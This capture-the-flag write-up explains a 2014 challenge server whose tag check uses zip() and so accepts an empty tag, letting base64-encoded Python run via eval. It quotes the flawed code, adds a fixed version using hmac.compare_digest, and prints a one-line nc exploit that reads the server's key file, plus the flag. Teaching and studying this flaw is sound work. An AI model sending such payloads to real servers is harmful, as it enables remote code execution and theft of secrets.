This challenge must have either been a joke or unintentionally broken; I solved it in like 2 minutes and it was worth 250 points. Unfortunately I was in a plane over the North Sea and not able to submit the flag in time :(

Basically the challenge consists of a server that takes a command in the format tag:command, where command is base64-encoded Python code that is executed if the tag (which is basically a signature) is correct. The tag is computed using a secret stored in a file called "secret".

We got 4 test commands (lc, echo, ls and stat) with valid signatures to analyze, presumably to find a hash-length-extension or similar attack on the tag. We don't need any of that, because the signature check itself is broken.

This code validates the signature:

match = True
for i, j in zip(tag, t):        # zip() stops at the shorter of the two sequences
    if i != j:
        match = False

del key
del cipher

if match:
    print 'Made it' + eval(compile(command, "script", "exec"))
else:
    self.request.send("Checks failed!\n")

tag is the given tag, t is the calculated tag.

Python's zip() pairs up items from its iterables only as far as the shortest one, so the loop compares at most len(tag) characters and never checks that the lengths agree. If we provide an empty tag, the loop body never runs, the if is never reached, and match keeps its initial value of True. (For the same reason any tag that is merely a prefix of the real one would also pass; a proper check compares the full values with hmac.compare_digest or at least verifies the lengths match.)
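To make the truncation concrete, here is an added example (my code, not the challenge's server or the author's exploit): a reconstruction of the broken loop beside a hardened check built on hmac.compare_digest. The challenge's real tag construction is not shown on the page, so HMAC-SHA256 over the base64 command with a constructed secret stands in for it; the names compute_tag, broken_verify, fixed_verify, parse_request and handle are mine.

```python
import base64
import hashlib
import hmac

# Constructed secret for the demo; the real challenge read its secret from a file.
SECRET = b"not-the-real-challenge-secret"


def compute_tag(command_b64):
    """Hypothetical tag function (assumption: HMAC-SHA256 over the base64 command).

    The challenge's actual tag construction is not shown in the writeup.
    """
    return hmac.new(SECRET, command_b64, hashlib.sha256).hexdigest()


def broken_verify(tag, t):
    """The challenge's check, as reconstructed from the writeup.

    zip() stops at the shorter input, so an empty tag (or any prefix of the
    real tag) never reaches the mismatch branch and match stays True.
    """
    match = True
    for i, j in zip(tag, t):
        if i != j:
            match = False
    return match


def fixed_verify(tag, t):
    """Hardened check: rejects length mismatches and compares in constant time."""
    return hmac.compare_digest(tag.encode(), t.encode())


def parse_request(line):
    """Split a 'tag:command' request line, the format the exploit relies on."""
    tag, _, command_b64 = line.strip().partition(b":")
    return tag.decode(), command_b64


def handle(line, verify):
    """Return True if the server would accept the line under the given verifier."""
    tag, command_b64 = parse_request(line)
    t = compute_tag(command_b64)
    return verify(tag, t)


# Constructed sample request: a harmless command and its genuine tag.
CMD = base64.b64encode(b"print('hello')")
GOOD = compute_tag(CMD)

if __name__ == "__main__":
    for label, tag in (("empty", ""), ("prefix", GOOD[:4]), ("genuine", GOOD)):
        line = tag.encode() + b":" + CMD
        print(label, "broken:", handle(line, broken_verify),
              "fixed:", handle(line, fixed_verify))
```

Running it shows the empty and prefix tags accepted by broken_verify and rejected by fixed_verify, while the genuine tag passes both.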

The exploit is:

echo :`echo "self.request.send(open('key').read())" | base64` | nc radioactive.2014.ghostintheshellcode.com 4324

Flag: Welcom3ToTheNewAgeItsARevolutionISuppose

by ccmndhd